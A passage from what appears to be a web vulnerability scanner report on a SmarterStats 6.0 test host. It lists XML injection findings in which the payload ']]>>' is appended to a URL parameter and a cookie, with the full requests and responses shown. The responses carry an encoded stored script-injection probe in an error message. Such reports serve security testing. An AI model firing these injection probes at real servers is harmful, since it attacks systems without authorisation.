</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.9. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [reportID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewOverviewReport.aspx

Issue detail

The reportID parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the reportID parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace]]>> HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:59 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7138



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   7 Day Overview - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace%5d%5d%3e%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       7 Day Overview
                   </div>
               </div>
           </div>
       
       
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewoverviewreport', 'OVERVIEW\x5fWorkspace\x5d\x5d\x3e\x3e');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewOverviewReport\x2easpx?reportID\x3dOVERVIEW\x5fWorkspace\x255d\x255d\x253e\x253e'); });
$(function() { SetTopTitle('7\x20Day\x20Overview'); });
//]]>
</script>
</form>
</body>
</html>


3.10. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The STHashCookie cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STHashCookie cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; STTTState=; STHashCookie={"CountsGuid":"1008079301","TopBarSection":"UserDemographics"}]]>>

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:23 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44346



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=Webmaster" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
